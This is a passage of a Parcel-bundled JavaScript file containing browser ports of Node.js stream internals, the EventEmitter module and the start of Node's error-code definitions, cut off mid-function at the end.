if (typeof Symbol === "function") $9845726cca5dc7eb$var$Readable.prototype[Symbol.asyncIterator] = function() {
    if ($9845726cca5dc7eb$var$createReadableStreamAsyncIterator === undefined) $9845726cca5dc7eb$var$createReadableStreamAsyncIterator = (parcelRequire("2UdT6"));
    return $9845726cca5dc7eb$var$createReadableStreamAsyncIterator(this);
};
Object.defineProperty($9845726cca5dc7eb$var$Readable.prototype, "readableHighWaterMark", {
    // making it explicit this property is not enumerable
    // because otherwise some prototype manipulation in
    // userland will fail
    enumerable: false,
    get: function get() {
        return this._readableState.highWaterMark;
    }
});
Object.defineProperty($9845726cca5dc7eb$var$Readable.prototype, "readableBuffer", {
    // making it explicit this property is not enumerable
    // because otherwise some prototype manipulation in
    // userland will fail
    enumerable: false,
    get: function get() {
        return this._readableState && this._readableState.buffer;
    }
});
Object.defineProperty($9845726cca5dc7eb$var$Readable.prototype, "readableFlowing", {
    // making it explicit this property is not enumerable
    // because otherwise some prototype manipulation in
    // userland will fail
    enumerable: false,
    get: function get() {
        return this._readableState.flowing;
    },
    set: function set(state) {
        if (this._readableState) this._readableState.flowing = state;
    }
});
// exposed for testing purposes only.
$9845726cca5dc7eb$var$Readable._fromList = $9845726cca5dc7eb$var$fromList;
Object.defineProperty($9845726cca5dc7eb$var$Readable.prototype, "readableLength", {
    // making it explicit this property is not enumerable
    // because otherwise some prototype manipulation in
    // userland will fail
    enumerable: false,
    get: function get() {
        return this._readableState.length;
    }
});
// Pluck off n bytes from an array of buffers.
// Length is the combined lengths of all the buffers in the list.
// This function is designed to be inlinable, so please take care when making
// changes to the function body.
function $9845726cca5dc7eb$var$fromList(n, state) {
    // nothing buffered
    if (state.length === 0) return null;
    var ret;
    if (state.objectMode) ret = state.buffer.shift();
    else if (!n || n >= state.length) {
        // read it all, truncate the list
        if (state.decoder) ret = state.buffer.join("");
        else if (state.buffer.length === 1) ret = state.buffer.first();
        else ret = state.buffer.concat(state.length);
        state.buffer.clear();
    } else // read part of list
    ret = state.buffer.consume(n, state.decoder);
    return ret;
}
function $9845726cca5dc7eb$var$endReadable(stream) {
    var state = stream._readableState;
    $9845726cca5dc7eb$var$debug("endReadable", state.endEmitted);
    if (!state.endEmitted) {
        state.ended = true;
        $hPtJY.nextTick($9845726cca5dc7eb$var$endReadableNT, state, stream);
    }
}
function $9845726cca5dc7eb$var$endReadableNT(state, stream) {
    $9845726cca5dc7eb$var$debug("endReadableNT", state.endEmitted, state.length);
    // Check that we didn't get one last unshift.
    if (!state.endEmitted && state.length === 0) {
        state.endEmitted = true;
        stream.readable = false;
        stream.emit("end");
        if (state.autoDestroy) {
            // In case of duplex streams we need a way to detect
            // if the writable side is ready for autoDestroy as well
            var wState = stream._writableState;
            if (!wState || wState.autoDestroy && wState.finished) stream.destroy();
        }
    }
}

if (typeof Symbol === "function") $9845726cca5dc7eb$var$Readable.from = function(iterable, opts) {
    if ($9845726cca5dc7eb$var$from === undefined) $9845726cca5dc7eb$var$from = (parcelRequire("e6P81"));
    return $9845726cca5dc7eb$var$from($9845726cca5dc7eb$var$Readable, iterable, opts);
};
function $9845726cca5dc7eb$var$indexOf(xs, x) {
    for(var i = 0, l = xs.length; i < l; i++){
        if (xs[i] === x) return i;
    }
    return -1;
}

});
parcelRequire.register("7etJZ", function(module, exports) {
// Copyright Joyent, Inc. and other Node contributors.
//
// Permission is hereby granted, free of charge, to any person obtaining a
// copy of this software and associated documentation files (the
// "Software"), to deal in the Software without restriction, including
// without limitation the rights to use, copy, modify, merge, publish,
// distribute, sublicense, and/or sell copies of the Software, and to permit
// persons to whom the Software is furnished to do so, subject to the
// following conditions:
//
// The above copyright notice and this permission notice shall be included
// in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
// OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
// NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
// DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
// OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
// USE OR OTHER DEALINGS IN THE SOFTWARE.
"use strict";
var $5440e9199a418654$var$R = typeof Reflect === "object" ? Reflect : null;
var $5440e9199a418654$var$ReflectApply = $5440e9199a418654$var$R && typeof $5440e9199a418654$var$R.apply === "function" ? $5440e9199a418654$var$R.apply : function ReflectApply(target, receiver, args) {
    return Function.prototype.apply.call(target, receiver, args);
};
var $5440e9199a418654$var$ReflectOwnKeys;
if ($5440e9199a418654$var$R && typeof $5440e9199a418654$var$R.ownKeys === "function") $5440e9199a418654$var$ReflectOwnKeys = $5440e9199a418654$var$R.ownKeys;
else if (Object.getOwnPropertySymbols) $5440e9199a418654$var$ReflectOwnKeys = function ReflectOwnKeys(target) {
    return Object.getOwnPropertyNames(target).concat(Object.getOwnPropertySymbols(target));
};
else $5440e9199a418654$var$ReflectOwnKeys = function ReflectOwnKeys(target) {
    return Object.getOwnPropertyNames(target);
};
function $5440e9199a418654$var$ProcessEmitWarning(warning) {
    if (console && console.warn) console.warn(warning);
}
var $5440e9199a418654$var$NumberIsNaN = Number.isNaN || function NumberIsNaN(value) {
    return value !== value;
};
function $5440e9199a418654$var$EventEmitter() {
    $5440e9199a418654$var$EventEmitter.init.call(this);
}
module.exports = $5440e9199a418654$var$EventEmitter;
module.exports.once = $5440e9199a418654$var$once;
// Backwards-compat with node 0.10.x
$5440e9199a418654$var$EventEmitter.EventEmitter = $5440e9199a418654$var$EventEmitter;
$5440e9199a418654$var$EventEmitter.prototype._events = undefined;
$5440e9199a418654$var$EventEmitter.prototype._eventsCount = 0;
$5440e9199a418654$var$EventEmitter.prototype._maxListeners = undefined;
// By default EventEmitters will print a warning if more than 10 listeners are
// added to it. This is a useful default which helps finding memory leaks.
var $5440e9199a418654$var$defaultMaxListeners = 10;
function $5440e9199a418654$var$checkListener(listener) {
    if (typeof listener !== "function") throw new TypeError('The "listener" argument must be of type Function. Received type ' + typeof listener);
}
Object.defineProperty($5440e9199a418654$var$EventEmitter, "defaultMaxListeners", {
    enumerable: true,
    get: function() {
        return $5440e9199a418654$var$defaultMaxListeners;
    },
    set: function(arg) {
        if (typeof arg !== "number" || arg < 0 || $5440e9199a418654$var$NumberIsNaN(arg)) throw new RangeError('The value of "defaultMaxListeners" is out of range. It must be a non-negative number. Received ' + arg + ".");
        $5440e9199a418654$var$defaultMaxListeners = arg;
    }
});
$5440e9199a418654$var$EventEmitter.init = function() {
    if (this._events === undefined || this._events === Object.getPrototypeOf(this)._events) {
        this._events = Object.create(null);
        this._eventsCount = 0;
    }
    this._maxListeners = this._maxListeners || undefined;
};
// Obviously not all Emitters should be limited to 10. This function allows
// that to be increased. Set to zero for unlimited.
$5440e9199a418654$var$EventEmitter.prototype.setMaxListeners = function setMaxListeners(n) {
    if (typeof n !== "number" || n < 0 || $5440e9199a418654$var$NumberIsNaN(n)) throw new RangeError('The value of "n" is out of range. It must be a non-negative number. Received ' + n + ".");
    this._maxListeners = n;
    return this;
};
function $5440e9199a418654$var$_getMaxListeners(that) {
    if (that._maxListeners === undefined) return $5440e9199a418654$var$EventEmitter.defaultMaxListeners;
    return that._maxListeners;
}
$5440e9199a418654$var$EventEmitter.prototype.getMaxListeners = function getMaxListeners() {
    return $5440e9199a418654$var$_getMaxListeners(this);
};
$5440e9199a418654$var$EventEmitter.prototype.emit = function emit(type) {
    var args = [];
    for(var i = 1; i < arguments.length; i++)args.push(arguments[i]);
    var doError = type === "error";
    var events = this._events;
    if (events !== undefined) doError = doError && events.error === undefined;
    else if (!doError) return false;
    // If there is no 'error' event listener then throw.
    if (doError) {
        var er;
        if (args.length > 0) er = args[0];
        if (er instanceof Error) // Note: The comments on the `throw` lines are intentional, they show
        // up in Node's output if this results in an unhandled exception.
        throw er; // Unhandled 'error' event
        // At least give some kind of context to the user
        var err = new Error("Unhandled error." + (er ? " (" + er.message + ")" : ""));
        err.context = er;
        throw err; // Unhandled 'error' event
    }
    var handler = events[type];
    if (handler === undefined) return false;
    if (typeof handler === "function") $5440e9199a418654$var$ReflectApply(handler, this, args);
    else {
        var len = handler.length;
        var listeners = $5440e9199a418654$var$arrayClone(handler, len);
        for(var i = 0; i < len; ++i)$5440e9199a418654$var$ReflectApply(listeners[i], this, args);
    }
    return true;
};
function $5440e9199a418654$var$_addListener(target, type, listener, prepend) {
    var m;
    var events;
    var existing;
    $5440e9199a418654$var$checkListener(listener);
    events = target._events;
    if (events === undefined) {
        events = target._events = Object.create(null);
        target._eventsCount = 0;
    } else {
        // To avoid recursion in the case that type === "newListener"! Before
        // adding it to the listeners, first emit "newListener".
        if (events.newListener !== undefined) {
            target.emit("newListener", type, listener.listener ? listener.listener : listener);
            // Re-assign `events` because a newListener handler could have caused the
            // this._events to be assigned to a new object
            events = target._events;
        }
        existing = events[type];
    }
    if (existing === undefined) {
        // Optimize the case of one listener. Don't need the extra array object.
        existing = events[type] = listener;
        ++target._eventsCount;
    } else {
        if (typeof existing === "function") // Adding the second element, need to change to array.
        existing = events[type] = prepend ? [
            listener,
            existing
        ] : [
            existing,
            listener
        ];
        else if (prepend) existing.unshift(listener);
        else existing.push(listener);
        // Check for listener leak
        m = $5440e9199a418654$var$_getMaxListeners(target);
        if (m > 0 && existing.length > m && !existing.warned) {
            existing.warned = true;
            // No error code for this since it is a Warning
            // eslint-disable-next-line no-restricted-syntax
            var w = new Error("Possible EventEmitter memory leak detected. " + existing.length + " " + String(type) + " listeners " + "added. Use emitter.setMaxListeners() to " + "increase limit");
            w.name = "MaxListenersExceededWarning";
            w.emitter = target;
            w.type = type;
            w.count = existing.length;
            $5440e9199a418654$var$ProcessEmitWarning(w);
        }
    }
    return target;
}
$5440e9199a418654$var$EventEmitter.prototype.addListener = function addListener(type, listener) {
    return $5440e9199a418654$var$_addListener(this, type, listener, false);
};
$5440e9199a418654$var$EventEmitter.prototype.on = $5440e9199a418654$var$EventEmitter.prototype.addListener;
$5440e9199a418654$var$EventEmitter.prototype.prependListener = function prependListener(type, listener) {
    return $5440e9199a418654$var$_addListener(this, type, listener, true);
};
function $5440e9199a418654$var$onceWrapper() {
    if (!this.fired) {
        this.target.removeListener(this.type, this.wrapFn);
        this.fired = true;
        if (arguments.length === 0) return this.listener.call(this.target);
        return this.listener.apply(this.target, arguments);
    }
}
function $5440e9199a418654$var$_onceWrap(target, type, listener) {
    var state = {
        fired: false,
        wrapFn: undefined,
        target: target,
        type: type,
        listener: listener
    };
    var wrapped = $5440e9199a418654$var$onceWrapper.bind(state);
    wrapped.listener = listener;
    state.wrapFn = wrapped;
    return wrapped;
}
$5440e9199a418654$var$EventEmitter.prototype.once = function once(type, listener) {
    $5440e9199a418654$var$checkListener(listener);
    this.on(type, $5440e9199a418654$var$_onceWrap(this, type, listener));
    return this;
};
$5440e9199a418654$var$EventEmitter.prototype.prependOnceListener = function prependOnceListener(type, listener) {
    $5440e9199a418654$var$checkListener(listener);
    this.prependListener(type, $5440e9199a418654$var$_onceWrap(this, type, listener));
    return this;
};
// Emits a 'removeListener' event if and only if the listener was removed.
$5440e9199a418654$var$EventEmitter.prototype.removeListener = function removeListener(type, listener) {
    var list, events, position, i, originalListener;
    $5440e9199a418654$var$checkListener(listener);
    events = this._events;
    if (events === undefined) return this;
    list = events[type];
    if (list === undefined) return this;
    if (list === listener || list.listener === listener) {
        if (--this._eventsCount === 0) this._events = Object.create(null);
        else {
            delete events[type];
            if (events.removeListener) this.emit("removeListener", type, list.listener || listener);
        }
    } else if (typeof list !== "function") {
        position = -1;
        for(i = list.length - 1; i >= 0; i--)if (list[i] === listener || list[i].listener === listener) {
            originalListener = list[i].listener;
            position = i;
            break;
        }
        if (position < 0) return this;
        if (position === 0) list.shift();
        else $5440e9199a418654$var$spliceOne(list, position);
        if (list.length === 1) events[type] = list[0];
        if (events.removeListener !== undefined) this.emit("removeListener", type, originalListener || listener);
    }
    return this;
};
$5440e9199a418654$var$EventEmitter.prototype.off = $5440e9199a418654$var$EventEmitter.prototype.removeListener;
$5440e9199a418654$var$EventEmitter.prototype.removeAllListeners = function removeAllListeners(type) {
    var listeners, events, i;
    events = this._events;
    if (events === undefined) return this;
    // not listening for removeListener, no need to emit
    if (events.removeListener === undefined) {
        if (arguments.length === 0) {
            this._events = Object.create(null);
            this._eventsCount = 0;
        } else if (events[type] !== undefined) {
            if (--this._eventsCount === 0) this._events = Object.create(null);
            else delete events[type];
        }
        return this;
    }
    // emit removeListener for all listeners on all events
    if (arguments.length === 0) {
        var keys = Object.keys(events);
        var key;
        for(i = 0; i < keys.length; ++i){
            key = keys[i];
            if (key === "removeListener") continue;
            this.removeAllListeners(key);
        }
        this.removeAllListeners("removeListener");
        this._events = Object.create(null);
        this._eventsCount = 0;
        return this;
    }
    listeners = events[type];
    if (typeof listeners === "function") this.removeListener(type, listeners);
    else if (listeners !== undefined) // LIFO order
    for(i = listeners.length - 1; i >= 0; i--)this.removeListener(type, listeners[i]);
    return this;
};
function $5440e9199a418654$var$_listeners(target, type, unwrap) {
    var events = target._events;
    if (events === undefined) return [];
    var evlistener = events[type];
    if (evlistener === undefined) return [];
    if (typeof evlistener === "function") return unwrap ? [
        evlistener.listener || evlistener
    ] : [
        evlistener
    ];
    return unwrap ? $5440e9199a418654$var$unwrapListeners(evlistener) : $5440e9199a418654$var$arrayClone(evlistener, evlistener.length);
}
$5440e9199a418654$var$EventEmitter.prototype.listeners = function listeners(type) {
    return $5440e9199a418654$var$_listeners(this, type, true);
};
$5440e9199a418654$var$EventEmitter.prototype.rawListeners = function rawListeners(type) {
    return $5440e9199a418654$var$_listeners(this, type, false);
};
$5440e9199a418654$var$EventEmitter.listenerCount = function(emitter, type) {
    if (typeof emitter.listenerCount === "function") return emitter.listenerCount(type);
    else return $5440e9199a418654$var$listenerCount.call(emitter, type);
};
$5440e9199a418654$var$EventEmitter.prototype.listenerCount = $5440e9199a418654$var$listenerCount;
function $5440e9199a418654$var$listenerCount(type) {
    var events = this._events;
    if (events !== undefined) {
        var evlistener = events[type];
        if (typeof evlistener === "function") return 1;
        else if (evlistener !== undefined) return evlistener.length;
    }
    return 0;
}
$5440e9199a418654$var$EventEmitter.prototype.eventNames = function eventNames() {
    return this._eventsCount > 0 ? $5440e9199a418654$var$ReflectOwnKeys(this._events) : [];
};
function $5440e9199a418654$var$arrayClone(arr, n) {
    var copy = new Array(n);
    for(var i = 0; i < n; ++i)copy[i] = arr[i];
    return copy;
}
function $5440e9199a418654$var$spliceOne(list, index) {
    for(; index + 1 < list.length; index++)list[index] = list[index + 1];
    list.pop();
}
function $5440e9199a418654$var$unwrapListeners(arr) {
    var ret = new Array(arr.length);
    for(var i = 0; i < ret.length; ++i)ret[i] = arr[i].listener || arr[i];
    return ret;
}
function $5440e9199a418654$var$once(emitter, name) {
    return new Promise(function(resolve, reject) {
        function errorListener(err) {
            emitter.removeListener(name, resolver);
            reject(err);
        }
        function resolver() {
            if (typeof emitter.removeListener === "function") emitter.removeListener("error", errorListener);
            resolve([].slice.call(arguments));
        }
        $5440e9199a418654$var$eventTargetAgnosticAddListener(emitter, name, resolver, {
            once: true
        });
        if (name !== "error") $5440e9199a418654$var$addErrorHandlerIfEventEmitter(emitter, errorListener, {
            once: true
        });
    });
}
function $5440e9199a418654$var$addErrorHandlerIfEventEmitter(emitter, handler, flags) {
    if (typeof emitter.on === "function") $5440e9199a418654$var$eventTargetAgnosticAddListener(emitter, "error", handler, flags);
}
function $5440e9199a418654$var$eventTargetAgnosticAddListener(emitter, name, listener, flags) {
    if (typeof emitter.on === "function") {
        if (flags.once) emitter.once(name, listener);
        else emitter.on(name, listener);
    } else if (typeof emitter.addEventListener === "function") // EventTarget does not have `error` event semantics like Node
    // EventEmitters, we do not listen for `error` events here.
    emitter.addEventListener(name, function wrapListener(arg) {
        // IE does not have builtin `{ once: true }` support so we
        // have to do it manually.
        if (flags.once) emitter.removeEventListener(name, wrapListener);
        listener(arg);
    });
    else throw new TypeError('The "emitter" argument must be of type EventEmitter. Received type ' + typeof emitter);
}

});

parcelRequire.register("jfAlf", function(module, exports) {

module.exports = (parcelRequire("7etJZ")).EventEmitter;

});

parcelRequire.register("bF5dL", function(module, exports) {
"use strict";
function $87d792cd1b95f90e$var$ownKeys(object, enumerableOnly) {
    var keys = Object.keys(object);
    if (Object.getOwnPropertySymbols) {
        var symbols = Object.getOwnPropertySymbols(object);
        enumerableOnly && (symbols = symbols.filter(function(sym) {
            return Object.getOwnPropertyDescriptor(object, sym).enumerable;
        })), keys.push.apply(keys, symbols);
    }
    return keys;
}
function $87d792cd1b95f90e$var$_objectSpread(target) {
    for(var i = 1; i < arguments.length; i++){
        var source = null != arguments[i] ? arguments[i] : {};
        i % 2 ? $87d792cd1b95f90e$var$ownKeys(Object(source), !0).forEach(function(key) {
            $87d792cd1b95f90e$var$_defineProperty(target, key, source[key]);
        }) : Object.getOwnPropertyDescriptors ? Object.defineProperties(target, Object.getOwnPropertyDescriptors(source)) : $87d792cd1b95f90e$var$ownKeys(Object(source)).forEach(function(key) {
            Object.defineProperty(target, key, Object.getOwnPropertyDescriptor(source, key));
        });
    }
    return target;
}
function $87d792cd1b95f90e$var$_defineProperty(obj, key, value) {
    key = $87d792cd1b95f90e$var$_toPropertyKey(key);
    if (key in obj) Object.defineProperty(obj, key, {
        value: value,
        enumerable: true,
        configurable: true,
        writable: true
    });
    else obj[key] = value;
    return obj;
}
function $87d792cd1b95f90e$var$_classCallCheck(instance, Constructor) {
    if (!(instance instanceof Constructor)) throw new TypeError("Cannot call a class as a function");
}
function $87d792cd1b95f90e$var$_defineProperties(target, props) {
    for(var i = 0; i < props.length; i++){
        var descriptor = props[i];
        descriptor.enumerable = descriptor.enumerable || false;
        descriptor.configurable = true;
        if ("value" in descriptor) descriptor.writable = true;
        Object.defineProperty(target, $87d792cd1b95f90e$var$_toPropertyKey(descriptor.key), descriptor);
    }
}
function $87d792cd1b95f90e$var$_createClass(Constructor, protoProps, staticProps) {
    if (protoProps) $87d792cd1b95f90e$var$_defineProperties(Constructor.prototype, protoProps);
    if (staticProps) $87d792cd1b95f90e$var$_defineProperties(Constructor, staticProps);
    Object.defineProperty(Constructor, "prototype", {
        writable: false
    });
    return Constructor;
}
function $87d792cd1b95f90e$var$_toPropertyKey(arg) {
    var key = $87d792cd1b95f90e$var$_toPrimitive(arg, "string");
    return typeof key === "symbol" ? key : String(key);
}
function $87d792cd1b95f90e$var$_toPrimitive(input, hint) {
    if (typeof input !== "object" || input === null) return input;
    var prim = input[Symbol.toPrimitive];
    if (prim !== undefined) {
        var res = prim.call(input, hint || "default");
        if (typeof res !== "object") return res;
        throw new TypeError("@@toPrimitive must return a primitive value.");
    }
    return (hint === "string" ? String : Number)(input);
}

var $6ZWSX = parcelRequire("6ZWSX");
var $87d792cd1b95f90e$var$Buffer = $6ZWSX.Buffer;

var $kjyEk = parcelRequire("kjyEk");
var $87d792cd1b95f90e$var$inspect = $kjyEk.inspect;
var $87d792cd1b95f90e$var$custom = $87d792cd1b95f90e$var$inspect && $87d792cd1b95f90e$var$inspect.custom || "inspect";
function $87d792cd1b95f90e$var$copyBuffer(src, target, offset) {
    $87d792cd1b95f90e$var$Buffer.prototype.copy.call(src, target, offset);
}
module.exports = /*#__PURE__*/ function() {
    function BufferList() {
        $87d792cd1b95f90e$var$_classCallCheck(this, BufferList);
        this.head = null;
        this.tail = null;
        this.length = 0;
    }
    $87d792cd1b95f90e$var$_createClass(BufferList, [
        {
            key: "push",
            value: function push(v) {
                var entry = {
                    data: v,
                    next: null
                };
                if (this.length > 0) this.tail.next = entry;
                else this.head = entry;
                this.tail = entry;
                ++this.length;
            }
        },
        {
            key: "unshift",
            value: function unshift(v) {
                var entry = {
                    data: v,
                    next: this.head
                };
                if (this.length === 0) this.tail = entry;
                this.head = entry;
                ++this.length;
            }
        },
        {
            key: "shift",
            value: function shift() {
                if (this.length === 0) return;
                var ret = this.head.data;
                if (this.length === 1) this.head = this.tail = null;
                else this.head = this.head.next;
                --this.length;
                return ret;
            }
        },
        {
            key: "clear",
            value: function clear() {
                this.head = this.tail = null;
                this.length = 0;
            }
        },
        {
            key: "join",
            value: function join(s) {
                if (this.length === 0) return "";
                var p = this.head;
                var ret = "" + p.data;
                while(p = p.next)ret += s + p.data;
                return ret;
            }
        },
        {
            key: "concat",
            value: function concat(n) {
                if (this.length === 0) return $87d792cd1b95f90e$var$Buffer.alloc(0);
                var ret = $87d792cd1b95f90e$var$Buffer.allocUnsafe(n >>> 0);
                var p = this.head;
                var i = 0;
                while(p){
                    $87d792cd1b95f90e$var$copyBuffer(p.data, ret, i);
                    i += p.data.length;
                    p = p.next;
                }
                return ret;
            }
        },
        {
            key: "consume",
            value: function consume(n, hasStrings) {
                var ret;
                if (n < this.head.data.length) {
                    // `slice` is the same for buffers and strings.
                    ret = this.head.data.slice(0, n);
                    this.head.data = this.head.data.slice(n);
                } else if (n === this.head.data.length) // First chunk is a perfect match.
                ret = this.shift();
                else // Result spans more than one buffer.
                ret = hasStrings ? this._getString(n) : this._getBuffer(n);
                return ret;
            }
        },
        {
            key: "first",
            value: function first() {
                return this.head.data;
            }
        },
        {
            key: "_getString",
            value: function _getString(n) {
                var p = this.head;
                var c = 1;
                var ret = p.data;
                n -= ret.length;
                while(p = p.next){
                    var str = p.data;
                    var nb = n > str.length ? str.length : n;
                    if (nb === str.length) ret += str;
                    else ret += str.slice(0, n);
                    n -= nb;
                    if (n === 0) {
                        if (nb === str.length) {
                            ++c;
                            if (p.next) this.head = p.next;
                            else this.head = this.tail = null;
                        } else {
                            this.head = p;
                            p.data = str.slice(nb);
                        }
                        break;
                    }
                    ++c;
                }
                this.length -= c;
                return ret;
            }
        },
        {
            key: "_getBuffer",
            value: function _getBuffer(n) {
                var ret = $87d792cd1b95f90e$var$Buffer.allocUnsafe(n);
                var p = this.head;
                var c = 1;
                p.data.copy(ret);
                n -= p.data.length;
                while(p = p.next){
                    var buf = p.data;
                    var nb = n > buf.length ? buf.length : n;
                    buf.copy(ret, ret.length - n, 0, nb);
                    n -= nb;
                    if (n === 0) {
                        if (nb === buf.length) {
                            ++c;
                            if (p.next) this.head = p.next;
                            else this.head = this.tail = null;
                        } else {
                            this.head = p;
                            p.data = buf.slice(nb);
                        }
                        break;
                    }
                    ++c;
                }
                this.length -= c;
                return ret;
            }
        },
        {
            key: $87d792cd1b95f90e$var$custom,
            value: function value(_, options) {
                return $87d792cd1b95f90e$var$inspect(this, $87d792cd1b95f90e$var$_objectSpread($87d792cd1b95f90e$var$_objectSpread({}, options), {}, {
                    // Only inspect one level.
                    depth: 0,
                    // It should not recurse.
                    customInspect: false
                }));
            }
        }
    ]);
    return BufferList;
}();

});

parcelRequire.register("fMCbt", function(module, exports) {

var $hPtJY = parcelRequire("hPtJY");
"use strict";
// undocumented cb() API, needed for core, not for public API
function $b7d8f541ca4a3ff5$var$destroy(err, cb) {
    var _this = this;
    var readableDestroyed = this._readableState && this._readableState.destroyed;
    var writableDestroyed = this._writableState && this._writableState.destroyed;
    if (readableDestroyed || writableDestroyed) {
        if (cb) cb(err);
        else if (err) {
            if (!this._writableState) $hPtJY.nextTick($b7d8f541ca4a3ff5$var$emitErrorNT, this, err);
            else if (!this._writableState.errorEmitted) {
                this._writableState.errorEmitted = true;
                $hPtJY.nextTick($b7d8f541ca4a3ff5$var$emitErrorNT, this, err);
            }
        }
        return this;
    }
    // we set destroyed to true before firing error callbacks in order
    // to make it re-entrance safe in case destroy() is called within callbacks
    if (this._readableState) this._readableState.destroyed = true;
    // if this is a duplex stream mark the writable part as destroyed as well
    if (this._writableState) this._writableState.destroyed = true;
    this._destroy(err || null, function(err) {
        if (!cb && err) {
            if (!_this._writableState) $hPtJY.nextTick($b7d8f541ca4a3ff5$var$emitErrorAndCloseNT, _this, err);
            else if (!_this._writableState.errorEmitted) {
                _this._writableState.errorEmitted = true;
                $hPtJY.nextTick($b7d8f541ca4a3ff5$var$emitErrorAndCloseNT, _this, err);
            } else $hPtJY.nextTick($b7d8f541ca4a3ff5$var$emitCloseNT, _this);
        } else if (cb) {
            $hPtJY.nextTick($b7d8f541ca4a3ff5$var$emitCloseNT, _this);
            cb(err);
        } else $hPtJY.nextTick($b7d8f541ca4a3ff5$var$emitCloseNT, _this);
    });
    return this;
}
function $b7d8f541ca4a3ff5$var$emitErrorAndCloseNT(self, err) {
    $b7d8f541ca4a3ff5$var$emitErrorNT(self, err);
    $b7d8f541ca4a3ff5$var$emitCloseNT(self);
}
function $b7d8f541ca4a3ff5$var$emitCloseNT(self) {
    if (self._writableState && !self._writableState.emitClose) return;
    if (self._readableState && !self._readableState.emitClose) return;
    self.emit("close");
}
function $b7d8f541ca4a3ff5$var$undestroy() {
    if (this._readableState) {
        this._readableState.destroyed = false;
        this._readableState.reading = false;
        this._readableState.ended = false;
        this._readableState.endEmitted = false;
    }
    if (this._writableState) {
        this._writableState.destroyed = false;
        this._writableState.ended = false;
        this._writableState.ending = false;
        this._writableState.finalCalled = false;
        this._writableState.prefinished = false;
        this._writableState.finished = false;
        this._writableState.errorEmitted = false;
    }
}
function $b7d8f541ca4a3ff5$var$emitErrorNT(self, err) {
    self.emit("error", err);
}
function $b7d8f541ca4a3ff5$var$errorOrDestroy(stream, err) {
    // We have tests that rely on errors being emitted
    // in the same tick, so changing this is semver major.
    // For now when you opt-in to autoDestroy we allow
    // the error to be emitted nextTick. In a future
    // semver major update we should change the default to this.
    var rState = stream._readableState;
    var wState = stream._writableState;
    if (rState && rState.autoDestroy || wState && wState.autoDestroy) stream.destroy(err);
    else stream.emit("error", err);
}
module.exports = {
    destroy: $b7d8f541ca4a3ff5$var$destroy,
    undestroy: $b7d8f541ca4a3ff5$var$undestroy,
    errorOrDestroy: $b7d8f541ca4a3ff5$var$errorOrDestroy
};

});

parcelRequire.register("04a3B", function(module, exports) {
"use strict";

var $6JySE = parcelRequire("6JySE");
var $00c82cf8dac417cf$var$ERR_INVALID_OPT_VALUE = $6JySE.codes.ERR_INVALID_OPT_VALUE;
function $00c82cf8dac417cf$var$highWaterMarkFrom(options, isDuplex, duplexKey) {
    return options.highWaterMark != null ? options.highWaterMark : isDuplex ? options[duplexKey] : null;
}
function $00c82cf8dac417cf$var$getHighWaterMark(state, options, duplexKey, isDuplex) {
    var hwm = $00c82cf8dac417cf$var$highWaterMarkFrom(options, isDuplex, duplexKey);
    if (hwm != null) {
        if (!(isFinite(hwm) && Math.floor(hwm) === hwm) || hwm < 0) {
            var name = isDuplex ? duplexKey : "highWaterMark";
            throw new $00c82cf8dac417cf$var$ERR_INVALID_OPT_VALUE(name, hwm);
        }
        return Math.floor(hwm);
    }
    // Default value
    return state.objectMode ? 16 : 16384;
}
module.exports = {
    getHighWaterMark: $00c82cf8dac417cf$var$getHighWaterMark
};

});
parcelRequire.register("6JySE", function(module, exports) {

$parcel$export(module.exports, "codes", () => $4e720097bc0bc9d8$export$e45cb6485273080e, (v) => $4e720097bc0bc9d8$export$e45cb6485273080e = v);
var $4e720097bc0bc9d8$export$e45cb6485273080e;
"use strict";
function $4e720097bc0bc9d8$var$_inheritsLoose(subClass, superClass) {
    subClass.prototype = Object.create(superClass.prototype);
    subClass.prototype.constructor = subClass;
    subClass.__proto__ = superClass;
}
var $4e720097bc0bc9d8$var$codes = {};
function $4e720097bc0bc9d8$var$createErrorType(code, message, Base) {
    if (!Base) Base = Error;
    function getMessage(arg1, arg2, arg3) {
        if (typeof message === "string") return message;
        else return message(arg1, arg2, arg3);
    }
    var NodeError = /*#__PURE__*/ function(_Base) {
        $4e720097bc0bc9d8$var$_inheritsLoose(NodeError, _Base);
        function NodeError(arg1, arg2, arg3) {
            return _Base.call(this, getMessage(arg1, arg2, arg3)) || this;
        }
        return NodeError;
    }(Base);
    NodeError.prototype.name = Base.name;
    NodeError.prototype.code = code;
    $4e720097bc0bc9d8$var$codes[code] = NodeError;
} // https://github.com/nodejs/node/blob/v10.8.0/lib/internal/errors.js
function $4e720097bc0bc9d8$var$oneOf(expected, thing) {
    if (Array.isArray(expected)) {
        var len = expected.length;
        expected = expected.map(function(i) {
            return String(i);
        });
        if (len > 2) return "one of ".concat(thing, " ").concat(expected.slice(0, len - 1).join(", "), ", or ") + expected[len - 1];
        else if (len === 2) return "one of ".concat(thing, " ").concat(expected[0], " or ").concat(expected[1]);
        else return "of ".concat(thing, " ").concat(expected[0]);
    } else return "of ".concat(thing, " ").concat(String(expected));
} // https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/startsWith
function $4e720097bc0bc9d8$var$startsWith(str, search, pos) {
    return str.substr(!pos || pos < 0 ? 0 : +pos, search.length) === search;
} // https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/endsWith
function $4e720097bc0bc9d8$var$endsWith(str, search, this_len) {
    if (this_len === undefined || this_len > str.length) this_len = str.length;
    return str.substring(this_len - search.length, this_len) === search;
} // https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/includes
function $4e720097bc0bc9d8$var$includes(str, search, start) {
    if (typeof start !== "number") start = 0;
    if (start + search.length > str.length) return false;
    else return str.indexOf(search, start) !== -1;
}
$4e720097bc0bc9d8$var$createErrorType("ERR_INVALID_OPT_VALUE", function(name, value) {
    return 'The value "' + value + '" is invalid for option "' + name + '"';
}, TypeError);
$4e720097bc0bc9d8$var$createErrorType("ERR_INVALID_ARG_TYPE", function(name, expected, actual) {
    // determiner: 'must be' or 'must not be'
